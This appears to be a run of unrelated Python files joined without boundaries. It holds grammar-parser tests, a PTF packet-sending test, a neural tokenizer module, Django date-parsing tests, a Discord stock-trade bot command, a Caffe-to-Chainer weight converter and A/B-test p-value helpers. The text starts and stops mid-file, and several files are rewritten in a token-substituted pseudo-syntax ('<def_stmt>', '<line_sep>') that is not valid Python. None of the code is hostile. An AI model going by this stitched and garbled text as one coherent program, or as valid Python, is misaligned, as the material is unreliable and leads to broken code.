# | # 'FUNCTION2( x , c )' [0 # 'S -> S "+" S' 1 # 'S -> S "-" S' 2 # 'S -> "FUNCTION1(" P ")"' 3 # 'P -> T' 6 # 'T -> "FUNCTION2(" "x" "," "c" ")"' 5 # 'S -> T' 6 # 'T -> "FUNCTION2(" "x" "," "c" ")"' 5 # 'S -> T' 6 # 'T -> "FUNCTION2(" "x" "," "c" ")"' 7 # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_indices_sequences self<block_start>grammar_rules=['S -> S "+" T' # index 0 'S -> T' # index 1 'T -> "(" S ")"' # index 2 'T -> "x"' # index 3 ]<line_sep># padding rule index 4 grammar=arithmetic_grammar.Grammar(grammar_rules)<line_sep>indices_sequences=grammar.parse_expressions_to_indices_sequences(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_equal(indices_sequences [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [0 # 'S -> S "+" T' 1 # 'S -> T' 3 # 'T -> "x"' 2 # 'T -> "(" S ")"' 1 # 'S -> T' 3 # 'T -> "x"' 4 # Padding dummy production rule. 4 # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_indices_sequences_padding_at_end_false self<block_start>grammar_rules=['S -> S "+" T' # index 1 'S -> T' # index 2 'T -> "(" S ")"' # index 3 'T -> "x"' # index 4 ]<line_sep># padding rule index 0 grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=<false>)<line_sep>indices_sequences=grammar.parse_expressions_to_indices_sequences(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_equal(indices_sequences [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [1 # 'S -> S "+" T' 2 # 'S -> T' 4 # 'T -> "x"' 3 # 'T -> "(" S ")"' 2 # 'S -> T' 4 # 'T -> "x"' 0 # Padding dummy production rule. 
0 # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_indices_sequences_pad_front_unique_start self<block_start>grammar_rules=['S -> S "+" T' # index 2 'S -> T' # index 3 'T -> "(" S ")"' # index 4 'T -> "x"' # index 5 ]<line_sep># padding rule index 0 # 'O -> S' will be added with index 1. grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=<false> add_unique_production_rule_to_start=<true>)<line_sep>indices_sequences=grammar.parse_expressions_to_indices_sequences(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_equal(indices_sequences [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # O # | # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [1 # 'O -> S' 2 # 'S -> S "+" T' 3 # 'S -> T' 5 # 'T -> "x"' 4 # 'T -> "(" S ")"' 3 # 'S -> T' 5 # 'T -> "x"' 0 # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_tensor self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<line_sep>expression_tensor=grammar.parse_expressions_to_tensor(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_allclose(expression_tensor [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [[1. 0. 0. 0. 0.] # 'S -> S "+" T' [0. 1. 0. 0. 0.] # 'S -> T' [0. 0. 0. 1. 0.] # 'T -> "x"' [0. 0. 1. 0. 0.] # 'T -> "(" S ")"' [0. 1. 0. 0. 0.] # 'S -> T' [0. 0. 0. 1. 0.] # 'T -> "x"' [0. 0. 0. 0. 1.] # Padding dummy production rule. [0. 0. 0. 0. 1.] # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_tensor_padding_at_end_false self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=<false>)<line_sep>expression_tensor=grammar.parse_expressions_to_tensor(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_allclose(expression_tensor [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [[0. 1. 0. 0. 0.] # 'S -> S "+" T' [0. 0. 1. 0. 0.] # 'S -> T' [0. 0. 0. 0. 1.] # 'T -> "x"' [0. 0. 0. 1. 0.] # 'T -> "(" S ")"' [0. 0. 1. 0. 0.] # 'S -> T' [0. 0. 0. 0. 1.] # 'T -> "x"' [1. 0. 0. 0. 0.] # Padding dummy production rule. [1. 0. 0. 0. 0.] # Padding dummy production rule. ]])<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end>
import sys

import ptf.packet as scapy
import ptf.dataplane as dataplane
import acs_base_test
from ptf.base_tests import BaseTest
import ptf.testutils as testutils
from ptf.testutils import *
import scapy.all as scapy2


class SendTCP(acs_base_test.ACSDataplaneTest):
    def runTest(self):
        pkt = scapy2.Ether(src="e4:1d:2d:a5:f3:ac", dst="00:02:03:04:05:00")
        pkt /= scapy2.IP(src="10.0.0.1", dst="10.0.0.0")

        # get L4 port number
        port_number = testutils.test_params_get("port_number")
        port = port_number["port_number"]
        pkt /= scapy2.TCP(sport=int(port))
        pkt /= ("badabadaboom")

        # get packets number
        count = testutils.test_params_get("count")
        pack_number = count["count"]

        # send packets
        send(self, 0, pkt, int(pack_number))
<import_stmt>sys<import_from_stmt>cube.networks.utils unpack mask_concat<line_sep>sys.path.append('')<import_stmt>os argparse<line_sep>os.environ["TOKENIZERS_PARALLELISM"]="false"<import_stmt>pytorch_lightning<as>pl<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_stmt>torch<import_from_stmt>cube.io_utils.objects Document Sentence Token Word<import_from_stmt>cube.io_utils.encodings Encodings<import_from_stmt>cube.io_utils.config TokenizerConfig<import_from_stmt>cube.networks.utils_tokenizer TokenCollate<import_stmt>numpy<as>np<import_from_stmt>cube.networks.modules ConvNorm LinearNorm MLP<import_from_stmt>torch.utils.data DataLoader<import_stmt>random<import_from_stmt>cube.networks.modules WordGram<class_stmt>Tokenizer(pl.LightningModule)<block_start><def_stmt>__init__ self config:TokenizerConfig encodings:Encodings language_codes:[]=<none> ext_word_emb=0 max_seq_len=-1<block_start>super().__init__()<line_sep>self._language_codes=language_codes<line_sep>self._config=config<line_sep>self._max_seq_len=max_seq_len<if_stmt><not>isinstance(ext_word_emb list)<block_start>ext_word_emb=[ext_word_emb]<block_end>self._ext_word_emb=ext_word_emb<line_sep>conv_layers=[]<line_sep>cs_inp=config.external_proj_size+config.lang_emb_size+256+16<line_sep>NUM_FILTERS=config.cnn_filter<for_stmt>_ range(config.cnn_layers)<block_start>conv_layer=nn.Sequential(ConvNorm(cs_inp NUM_FILTERS kernel_size=5 stride=1 padding=2 dilation=1 w_init_gain='tanh') nn.BatchNorm1d(NUM_FILTERS))<line_sep>conv_layers.append(conv_layer)<line_sep>cs_inp=NUM_FILTERS<floordiv>2+config.lang_emb_size<block_end>self._convs=nn.ModuleList(conv_layers)<line_sep>self._wg=WordGram(len(encodings.char2int) num_langs=encodings.num_langs)<line_sep>self._lang_emb=nn.Embedding(encodings.num_langs+1 config.lang_emb_size padding_idx=0)<line_sep>self._spa_emb=nn.Embedding(3 16 padding_idx=0)<line_sep>self._output=LinearNorm(NUM_FILTERS<floordiv>2+config.lang_emb_size 5)<line_sep>ext2int=[]<for_stmt>input_size self._ext_word_emb<block_start>module=MLP(input_size config.external_proj_size)<line_sep>ext2int.append(module)<block_end>self._ext_proj=nn.ModuleList(ext2int)<if_stmt>self._language_codes# only for training <block_start>self._dev_results={i:[]<for>i,_ enumerate(self._language_codes)}<line_sep>self._res={}<for_stmt>language_code self._language_codes<block_start>self._res[language_code]={"sent":0. 
"token":0.}<block_end>self._early_stop_meta_val=0<line_sep>self._epoch_results={}<block_end><block_end><def_stmt>forward self batch<block_start>x_emb=batch['x_input']<line_sep>x_spa=batch['x_input_spa']<line_sep>x_lang=batch['x_lang']<line_sep>x_lang=self._lang_emb(x_lang).unsqueeze(1).repeat(1 x_emb[0].shape[1] 1)<line_sep>x_word_char=batch['x_word_char']<line_sep>x_word_case=batch['x_word_case']<line_sep>x_word_lang=batch['x_word_lang']<line_sep>x_word_masks=batch['x_word_masks']<line_sep>x_word_len=batch['x_word_len']<line_sep>x_sent_len=batch['x_sent_len']<line_sep>char_emb_packed=self._wg(x_word_char x_word_case x_word_lang x_word_masks x_word_len)<line_sep>sl=x_sent_len.cpu().numpy()<line_sep>x_char_emb=unpack(char_emb_packed sl x_emb[0].shape[1] device=self._get_device())<line_sep>word_emb_ext=<none><for_stmt>ii range(len(x_emb))<block_start>we=x_emb[ii]<if_stmt>word_emb_ext<is><none><block_start>word_emb_ext=self._ext_proj[ii](we.float().to(self._get_device()))<block_end><else_stmt><block_start>word_emb_ext=word_emb_ext+self._ext_proj[ii](we)<block_end><block_end>word_emb_ext=word_emb_ext/len(x_emb)<line_sep>word_emb_ext=torch.tanh(word_emb_ext)<line_sep>x_emb=word_emb_ext<line_sep>x_spa_emb=self._spa_emb(x_spa)<line_sep>x_emb=mask_concat([x_emb x_char_emb] 0.33 self.training self._get_device())<line_sep>x_emb=torch.cat([x_emb x_spa_emb] dim=-1)<line_sep>x=torch.cat([x_emb x_lang] dim=-1).permute(0 2 1)<line_sep>x_lang=x_lang.permute(0 2 1)<line_sep>half=self._config.cnn_filter<floordiv>2<line_sep>res=<none><line_sep>cnt=0<for_stmt>conv self._convs<block_start>conv_out=conv(x)<line_sep>tmp=torch.tanh(conv_out[: :half :])<times>torch.sigmoid((conv_out[: half: :]))<if_stmt>res<is><none><block_start>res=tmp<block_end><else_stmt><block_start>res=res+tmp<block_end>x=torch.dropout(tmp 0.2 self.training)<line_sep>cnt<augadd>1<if_stmt>cnt<ne>self._config.cnn_layers<block_start>x=torch.cat([x x_lang] dim=1)<block_end><block_end>x=x+res<line_sep>x=torch.cat([x x_lang] dim=1)<line_sep>x=x.permute(0 2 1)<line_sep><return>self._output(x)<block_end><def_stmt>validation_step self batch batch_idx<block_start><if_stmt>batch['x_input']<is><none><block_start>print("Return 0")<line_sep><return><none><block_end>x_lang=batch['x_lang']<line_sep>x_text=batch['x_text']<line_sep>y_offset=batch['y_offset'].cpu().numpy()<line_sep>y_target=batch['y_output'].cpu().numpy()<line_sep>y_len=batch['y_len'].cpu().numpy()<line_sep>x_l=x_lang.cpu().numpy()<line_sep>y_pred=self.forward(batch)<line_sep>y_pred=torch.argmax(y_pred dim=-1).detach().cpu().numpy()<for_stmt>ii range(len(y_len))<block_start>ofs=y_offset[ii]<line_sep>lang=x_l[ii]-1<for_stmt>jj range(y_len[ii])<block_start>self._dev_results[lang].append([x_text[ii][jj] y_target[ii jj+ofs] y_pred[ii jj+ofs]])<block_end><block_end><block_end><def_stmt>validation_epoch_end self outputs<arrow><none># empty accumulator # results = {langid: {'SENT_F': 0, 'TOK_F': 0} for langid in self._id2lang} <block_start>results={}<for_stmt>lang self._dev_results<block_start>data=self._dev_results[lang]<line_sep>g_sents=[]<line_sep>p_sents=[]<line_sep>tok_p=''<line_sep>tok_g=''<line_sep>g_sent=[]<line_sep>p_sent=[]<for_stmt>example data<block_start>target=example[1]<line_sep>pred=example[2]<line_sep>text=example[0].replace('▁' 
'')<line_sep>tok_g<augadd>text<line_sep>tok_p<augadd>text<if_stmt>target<eq>2<or>target<eq>3<or>target<eq>4<block_start><if_stmt>tok_g.strip()<ne>''<block_start>g_sent.append(tok_g)<block_end>tok_g=''<block_end><if_stmt>target<eq>4<block_start><if_stmt>len(g_sent)<ne>0<block_start>g_sents.append(g_sent)<block_end>g_sent=[]<block_end><if_stmt>pred<eq>2<or>pred<eq>3<or>pred<eq>4<block_start><if_stmt>tok_p.strip()<ne>''<block_start>p_sent.append(tok_p)<block_end>tok_p=''<block_end><if_stmt>pred<eq>4<block_start><if_stmt>len(p_sent)<ne>0<block_start>p_sents.append(p_sent)<block_end>p_sent=[]<block_end><block_end><if_stmt>tok_g.strip()<ne>''<block_start>g_sent.append(tok_g)<block_end><if_stmt>len(g_sent)<ne>0<block_start>g_sents.append(g_sent)<block_end><if_stmt>tok_p.strip()<ne>''<block_start>p_sent.append(tok_p)<block_end><if_stmt>len(p_sent)<ne>0<block_start>p_sents.append(p_sent)<block_end>sent_f,tok_f=_conll_eval(g_sents p_sents)<if_stmt>self._language_codes<is><not><none><block_start>lang=self._language_codes[lang]<block_end>results[lang]={}<line_sep>results[lang]['sent']=sent_f<line_sep>results[lang]['token']=tok_f<line_sep>self.log('val/SENT/{0}'.format(lang) sent_f)<line_sep>self.log('val/TOKEN/{0}'.format(lang) tok_f)<block_end>self._dev_results={i:[]<for>i,_ enumerate(self._language_codes)}<line_sep>self._epoch_results=self._compute_early_stop(results)<line_sep>self.log('val/early_meta' self._early_stop_meta_val)<block_end><def_stmt>training_step self batch batch_idx<block_start><if_stmt>batch['x_input']<is><none><block_start>print("Return 0")<line_sep><return><none><block_end>y_target=batch['y_output']<if_stmt>self._max_seq_len<ne>-1<and>y_target.shape[1]<g>self._max_seq_len# fix for HF <block_start><return><none><block_end>y_pred=self.forward(batch)<line_sep>loss=F.cross_entropy(y_pred.view(-1 y_pred.shape[2]) y_target.view(-1) ignore_index=0)<line_sep><return>loss<block_end><def_stmt>load self model_path:str device:str='cpu'<block_start>self.load_state_dict(torch.load(model_path map_location='cpu')['state_dict'])<line_sep>self.to(device)<block_end><def_stmt>process self raw_text collate:TokenCollate batch_size=32 num_workers:int=4 lang_id:int=0<block_start>raw_text=raw_text.replace('\n' ' ').replace('\r' ' ')<line_sep>new_text=raw_text.replace(' ' ' ')<while_stmt>new_text<ne>raw_text<block_start>raw_text=new_text<line_sep>new_text=raw_text.replace(' ' ' ')<block_end>self.eval()<import_from_stmt>cube.networks.utils_tokenizer TokenDatasetLive<line_sep>dataset=TokenDatasetLive(raw_text collate.get_tokens)<line_sep>collate._lang_id=lang_id<line_sep>dataloader=DataLoader(dataset batch_size=batch_size collate_fn=collate.collate_fn shuffle=<false> num_workers=num_workers)<line_sep>toks=[]<line_sep>preds=[]<import_stmt>tqdm<for_stmt>batch dataloader# tqdm.tqdm(dataloader): <block_start><for_stmt>key batch<block_start><if_stmt>isinstance(batch[key] torch.Tensor)<block_start>batch[key]=batch[key].to(self._device)<block_end><block_end>x_text=batch['x_text']<line_sep>y_offset=batch['y_offset'].cpu().numpy()<line_sep>y_len=batch['y_len'].cpu().numpy()<with_stmt>torch.no_grad()<block_start>y_pred=self.forward(batch)<block_end>y_pred=torch.argmax(y_pred dim=-1).detach().cpu().numpy()<for_stmt>ii range(len(y_len))<block_start>ofs=y_offset[ii]<for_stmt>jj range(y_len[ii])<block_start>toks.append(x_text[ii][jj])<line_sep>preds.append(y_pred[ii jj+ofs])<block_end><block_end><block_end>p_sents=[]<line_sep>tok_p=''<line_sep>p_mwes=[]<line_sep>p_sent=[]<line_sep>p_mwe=[]<for_stmt>pred,text zip(preds 
toks)<block_start>text=text.replace('▁' '')<line_sep>tok_p<augadd>text<if_stmt>pred<eq>2<or>pred<eq>3<or>pred<eq>4<block_start><if_stmt>tok_p.strip()<ne>''<block_start>p_sent.append(tok_p)<if_stmt>pred<eq>3<block_start>p_mwe.append(<true>)<block_end><else_stmt><block_start>p_mwe.append(<false>)<block_end><block_end>tok_p=''<block_end><if_stmt>pred<eq>4<block_start><if_stmt>len(p_sent)<ne>0<block_start>p_sents.append(p_sent)<line_sep>p_mwes.append(p_mwe)<block_end>p_sent=[]<line_sep>p_mwe=[]<block_end><block_end><if_stmt>tok_p.strip()<ne>''<block_start>p_sent.append(tok_p)<line_sep>p_mwe.append(<false>)<block_end><if_stmt>len(p_sent)<ne>0<block_start>p_sents.append(p_sent)<line_sep>p_mwes.append(p_mwe)<block_end>d=Document()<for_stmt>sent,mwe zip(p_sents p_mwes)<block_start>seq=[]<line_sep>cnt=0<line_sep>spaceafter="_"<for_stmt>w,m zip(sent mwe)<block_start>cnt<augadd>1<line_sep>seq.append(Word(cnt w '_' '_' '_' '_' 0 '_' '_' spaceafter))<if_stmt>m<block_start>seq[-1].space_after<augadd>';compund'<block_end><block_end>s=Sentence(sequence=seq lang_id=lang_id)<line_sep>d.sentences.append(s)<block_end><return>d<block_end><def_stmt>configure_optimizers self<block_start><return>torch.optim.AdamW(self.parameters())<block_end><def_stmt>_compute_early_stop self res<block_start><for_stmt>lang res<block_start><if_stmt>res[lang]["sent"]<g>self._res[lang]["sent"]<block_start>self._early_stop_meta_val<augadd>1<line_sep>self._res[lang]["sent"]=res[lang]["sent"]<line_sep>res[lang]["sent_best"]=<true><block_end><if_stmt>res[lang]["token"]<g>self._res[lang]["token"]<block_start>self._early_stop_meta_val<augadd>1<line_sep>self._res[lang]["token"]=res[lang]["token"]<line_sep>res[lang]["token_best"]=<true><block_end><block_end><return>res<block_end><def_stmt>_get_device self<block_start><if_stmt>self._lang_emb.weight.device.type<eq>'cpu'<block_start><return>'cpu'<block_end><return>'{0}:{1}'.format(self._lang_emb.weight.device.type str(self._lang_emb.weight.device.index))<block_end><def_stmt>_detect_no_space_lang document:Document<block_start>seen_spc=0<line_sep>POLL_RANGE=50<for_stmt>ii range(POLL_RANGE)<block_start>index=random.randint(0 len(document.sentences)-1)<line_sep>text=document.sentences[index].text.strip()<if_stmt>' '<in>text<block_start>seen_spc<augadd>1<block_end><block_end><if_stmt>seen_spc/POLL_RANGE<g>0.5<block_start><return><false><block_end><else_stmt><block_start><return><true><block_end><block_end><class_stmt>PrintAndSaveCallback(pl.callbacks.Callback)<block_start><def_stmt>__init__ self store_prefix<block_start>super().__init__()<line_sep>self.store_prefix=store_prefix<block_end><def_stmt>on_validation_end self trainer pl_module<block_start>metrics=trainer.callback_metrics<line_sep>epoch=trainer.current_epoch<line_sep># from pprint import pprint # pprint(metrics) <for_stmt>lang pl_module._epoch_results<block_start>res=pl_module._epoch_results[lang]<if_stmt>"sent_best"<in>res<block_start>trainer.save_checkpoint(self.store_prefix+"."+lang+".sent")<block_end><if_stmt>"token_best"<in>res<block_start>trainer.save_checkpoint(self.store_prefix+"."+lang+".tok")<block_end><block_end>trainer.save_checkpoint(self.store_prefix+".last")<line_sep>s="{0:30s}\tSENT\tTOKEN".format("Language")<line_sep>print("\n\n\t"+s)<line_sep>print("\t"+("="<times>(len(s)+9)))<for_stmt>lang pl_module._language_codes<block_start>sent=metrics["val/SENT/{0}".format(lang)]<line_sep>token=metrics["val/TOKEN/{0}".format(lang)]<line_sep>msg="\t{0:30s}:\t{1:.4f}\t{2:.4f}".format(lang sent 
token)<line_sep>print(msg)<block_end>print("\n")<block_end><block_end><block_end><def_stmt>_conll_eval gold pred<block_start>f=open('tmp_g.txt' 'w')<for_stmt>sent gold<block_start><for_stmt>ii range(len(sent))<block_start>head=ii<line_sep>f.write('{0}\t{1}\t_\t_\t_\t_\t{2}\t_\t_\t_\n'.format(ii+1 sent[ii] head))<block_end>f.write('\n')<block_end>f.close()<line_sep>f=open('tmp_p.txt' 'w')<for_stmt>sent pred<block_start><for_stmt>ii range(len(sent))<block_start>head=ii<line_sep>f.write('{0}\t{1}\t_\t_\t_\t_\t{2}\t_\t_\t_\n'.format(ii+1 sent[ii] head))<block_end>f.write('\n')<block_end>f.close()<import_from_stmt>_cube.misc.conll18_ud_eval_wrapper conll_eval<line_sep>result=conll_eval('tmp_g.txt' 'tmp_p.txt')<if_stmt>result<is><none><block_start><return>0 0<block_end><else_stmt><block_start><return>result['Sentences'].f1 result['Tokens'].f1<block_end><block_end>""" if __name__ == '__main__': from cube.io_utils.misc import ArgParser argparser = ArgParser() # run argparser args = argparser() print(args) # example import json langs = json.load(open(args.train_file)) doc_train = Document() doc_dev = Document() id2lang = {} for ii in range(len(langs)): lang = langs[ii] print(lang[1], ii) doc_train.load(lang[1], lang_id=ii) doc_dev.load(lang[2], lang_id=ii) id2lang[ii] = lang[0] # ensure target dir exists target = args.store i = args.store.rfind("/") if i > 0: target = args.store[:i] os.makedirs(target, exist_ok=True) enc = Encodings() enc.compute(doc_train, None) enc.save('{0}.encodings'.format(args.store)) config = TokenizerConfig() no_space_lang = _detect_no_space_lang(doc_train) print("NO_SPACE_LANG = " + str(no_space_lang)) config.no_space_lang = no_space_lang config.lm_model = args.lm_model if args.config_file: config.load(args.config_file) if args.lm_model is not None: config.lm_model = args.lm_model config.save('{0}.config'.format(args.store)) # helper = LMHelper(device=args.lm_device, model=config.lm_model) # helper.apply(doc_dev) # helper.apply(doc_train) trainset = TokenizationDataset(doc_train) devset = TokenizationDataset(doc_dev, shuffle=False) collate = TokenCollate(enc, lm_device=args.lm_device, lm_model=args.lm_model, no_space_lang=config.no_space_lang) train_loader = DataLoader(trainset, batch_size=args.batch_size, collate_fn=collate.collate_fn, shuffle=True, num_workers=args.num_workers) val_loader = DataLoader(devset, batch_size=args.batch_size, collate_fn=collate.collate_fn, num_workers=args.num_workers) model = Tokenizer(config=config, encodings=enc, id2lang=id2lang) # training early_stopping_callback = EarlyStopping( monitor='val/early_meta', patience=args.patience, verbose=True, mode='max' ) if args.gpus == 0: acc = 'ddp_cpu' else: acc = 'ddp' trainer = pl.Trainer( gpus=args.gpus, accelerator=acc, num_nodes=1, default_root_dir='data/', callbacks=[early_stopping_callback, PrintAndSaveCallback(args, id2lang)], # limit_train_batches=5, # limit_val_batches=2, ) trainer.fit(model, train_loader, val_loader) """<line_sep>
from __future__ import unicode_literals

import datetime

import django
import mock
from django.test import TestCase
from django.utils.timezone import utc

import util.parse as parse_util


class TestParse(TestCase):

    def setUp(self):
        django.setup()

    def test_duration_to_string(self):
        """Tests converting timedelta duration to ISO duration string"""
        duration_1 = datetime.timedelta(seconds=0)
        self.assertEqual(parse_util.duration_to_string(duration_1), 'PT0S')

        duration_2 = datetime.timedelta(days=4, seconds=58426)
        self.assertEqual(parse_util.duration_to_string(duration_2), 'P4DT16H13M46S')

        duration_3 = datetime.timedelta(seconds=542.0894)
        self.assertEqual(parse_util.duration_to_string(duration_3), 'PT9M2S')

        duration_4 = datetime.timedelta(seconds=542.5894)
        self.assertEqual(parse_util.duration_to_string(duration_4), 'PT9M3S')

    def test_parse_duration(self):
        """Tests parsing a valid ISO duration."""
        self.assertEqual(parse_util.parse_duration('PT3H0M0S'), datetime.timedelta(0, 10800))

    def test_parse_duration_invalid(self):
        """Tests parsing an invalid ISO duration."""
        self.assertIsNone(parse_util.parse_duration('BAD'))

    def test_parse_datetime(self):
        """Tests parsing a valid ISO datetime."""
        self.assertEqual(parse_util.parse_datetime('2015-01-01T00:00:00Z'),
                         datetime.datetime(2015, 1, 1, tzinfo=utc))

    def test_parse_datetime_invalid(self):
        """Tests parsing an invalid ISO datetime."""
        self.assertIsNone(parse_util.parse_datetime('20150101T00:00:00Z'))

    def test_parse_datetime_missing_timezone(self):
        """Tests parsing an ISO datetime missing a timezone."""
        self.assertRaises(ValueError, parse_util.parse_datetime, '2015-01-01T00:00:00')

    @mock.patch('django.utils.timezone.now')
    def test_parse_timestamp_duration(self, mock_now):
        """Tests parsing a valid ISO duration."""
        mock_now.return_value = datetime.datetime(2015, 1, 1, 10, tzinfo=utc)
        self.assertEqual(parse_util.parse_timestamp('PT3H0M0S'),
                         datetime.datetime(2015, 1, 1, 7, tzinfo=utc))

    def test_parse_timestamp_datetime(self):
        """Tests parsing a valid ISO datetime."""
        self.assertEqual(parse_util.parse_timestamp('2015-01-01T00:00:00Z'),
                         datetime.datetime(2015, 1, 1, tzinfo=utc))
import discord
import pandas as pd

from gamestonk_terminal.stocks.due_diligence import ark_model

import discordbot.config_discordbot as cfg
from discordbot.run_discordbot import logger
from discordbot.helpers import pagination


async def arktrades_command(ctx, ticker="", num=""):
    """Displays trades made by ark [cathiesark.com]"""
    try:
        # Debug user input
        if cfg.DEBUG:
            logger.debug("!stocks.dd.arktrades %s", ticker)

        if num == "":
            pass
        else:
            if not num.lstrip("-").isnumeric():
                raise Exception("Number has to be an integer")
            num = int(num)

        if ticker == "":
            raise Exception("A ticker is required")

        ark_holdings = ark_model.get_ark_trades_by_ticker(ticker)

        if ark_holdings.empty:
            raise Exception(
                "Issue getting data from cathiesark.com. Likely no trades found.\n"
            )

        ark_holdings = ark_holdings.drop(columns=["ticker"])
        ark_holdings["Total"] = ark_holdings["Total"] / 1_000_000
        ark_holdings.rename(
            columns={"Close": "Close ($)", "Total": "Total ($1M)"}, inplace=True
        )

        ark_holdings.index = pd.Series(ark_holdings.index).apply(
            lambda x: x.strftime("%Y-%m-%d")
        )

        if num == "":
            ark_holdings_str = ark_holdings.to_string()
        else:
            ark_holdings_str = ark_holdings.head(num).to_string()

        if len(ark_holdings_str) <= 4000:
            embed = discord.Embed(
                title=f"Stocks: [cathiesark.com] {ticker} Trades by Ark",
                description="```" + ark_holdings_str + "```",
                colour=cfg.COLOR,
            )
            embed.set_author(
                name=cfg.AUTHOR_NAME,
                icon_url=cfg.AUTHOR_ICON_URL,
            )
            await ctx.send(embed=embed)
        else:
            i = 0
            str_start = 0
            str_end = 4000
            columns = []
            while i <= len(ark_holdings_str) / 4000:
                columns.append(
                    discord.Embed(
                        title=f"Stocks: [cathiesark.com] {ticker} Trades by Ark",
                        description="```" + ark_holdings_str[str_start:str_end] + "```",
                        colour=cfg.COLOR,
                    ).set_author(
                        name=cfg.AUTHOR_NAME,
                        icon_url=cfg.AUTHOR_ICON_URL,
                    )
                )
                # advance the 4000-character pagination window
                str_start += 4000
                str_end += 4000
                i += 1
            await pagination(columns, ctx)

    except Exception as e:
        embed = discord.Embed(
            title=f"ERROR Stocks: [cathiesark.com] {ticker} Trades by Ark",
            colour=cfg.COLOR,
            description=e,
        )
        embed.set_author(
            name=cfg.AUTHOR_NAME,
            icon_url=cfg.AUTHOR_ICON_URL,
        )
        await ctx.send(embed=embed)
<import_stmt>argparse<import_stmt>re<import_stmt>chainer<import_from_stmt>chainer Link<import_stmt>chainer.links.caffe.caffe_function<as>caffe<line_sep>""" Please download a weight from here. http://www.robots.ox.ac.uk/%7Evgg/software/very_deep/caffe/VGG_ILSVRC_16_layers.caffemodel """<def_stmt>rename name<block_start>m=re.match(r'conv(\d+)_(\d+)$' name)<if_stmt>m<block_start>i,j=map(int m.groups())<line_sep><return>'conv{:d}_{:d}/conv'.format(i j)<block_end><return>name<block_end><class_stmt>VGGCaffeFunction(caffe.CaffeFunction)<block_start><def_stmt>__init__ self model_path<block_start>print('loading weights from {:s} ... '.format(model_path))<line_sep>super(VGGCaffeFunction self).__init__(model_path)<block_end><def_stmt>__setattr__ self name value<block_start><if_stmt>self.within_init_scope<and>isinstance(value Link)<block_start>new_name=rename(name)<if_stmt>new_name<eq>'conv1_1/conv'# BGR -> RGB <block_start>value.W.array[: ::-1]=value.W.array<line_sep>print('{:s} -> {:s} (BGR -> RGB)'.format(name new_name))<block_end><else_stmt><block_start>print('{:s} -> {:s}'.format(name new_name))<block_end><block_end><else_stmt><block_start>new_name=name<block_end>super(VGGCaffeFunction self).__setattr__(new_name value)<block_end><block_end><def_stmt>main <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('caffemodel')<line_sep>parser.add_argument('output')<line_sep>args=parser.parse_args()<line_sep>model=VGGCaffeFunction(args.caffemodel)<line_sep>chainer.serializers.save_npz(args.output model)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
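# --- Hedged illustration (not part of the original script) ---
# A minimal check of what the rename() helper above does: caffe layer names of
# the form "convN_M" are mapped to the chainer link path "convN_M/conv", and
# everything else is returned unchanged. The two sample names are assumptions.
assert rename('conv3_2') == 'conv3_2/conv'
assert rename('fc6') == 'fc6'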
<import_stmt>numpy<as>np<import_stmt>scipy.stats<def_stmt>t_test a b<block_start>""" Calculates two-sided t-test p-values for multiple experiments :param a: np.array shape (n_experiments, n_users), metric values in control group :param b: np.array shape (n_experiments, n_users), metric values in treatment group :return: np.array shape (n_experiments), two-sided p-values of t-test in all experiments """<line_sep>result=list(map(<lambda>x:scipy.stats.ttest_ind(x[0] x[1]).pvalue zip(a b)))<line_sep><return>np.array(result)<block_end><def_stmt>mannwhitney a b<block_start>""" Calculates two-sided Mann-Whitney U test p-values for multiple experiments :param a: np.array shape (n_experiments, n_users), metric values in control group :param b: np.array shape (n_experiments, n_users), metric values in treatment group :return: np.array shape (n_experiments), two-sided p-values of Mann-Whitney test in all experiments """<line_sep>result=list(map(<lambda>x:scipy.stats.mannwhitneyu(x[0] x[1] alternative='two-sided').pvalue zip(a b)))<line_sep><return>np.array(result)<block_end><def_stmt>get_smoothed_ctrs clicks_0 views_0 clicks_1 views_1 smothing_factor=200.<block_start>""" Calculates smoothed ctr for every user in every experiment both in treatment and control groups Smoothed_ctr = (user_clicks + smothing_factor * global_ctr) / (user_views + smothing_factor) :param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment :param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment :param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment :param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment :param smothing_factor: float :return: (np.array, np.array) shape (n_experiments, n_users), smoothed ctrs for every user in every experiment """<line_sep>global_ctr=(np.sum(clicks_0 axis=1)/np.sum(views_0 axis=1)).reshape(-1 1)<line_sep>ctrs_0=(clicks_0+smothing_factor<times>global_ctr)/(views_0+smothing_factor)<line_sep>ctrs_1=(clicks_1+smothing_factor<times>global_ctr)/(views_1+smothing_factor)<line_sep><return>ctrs_0 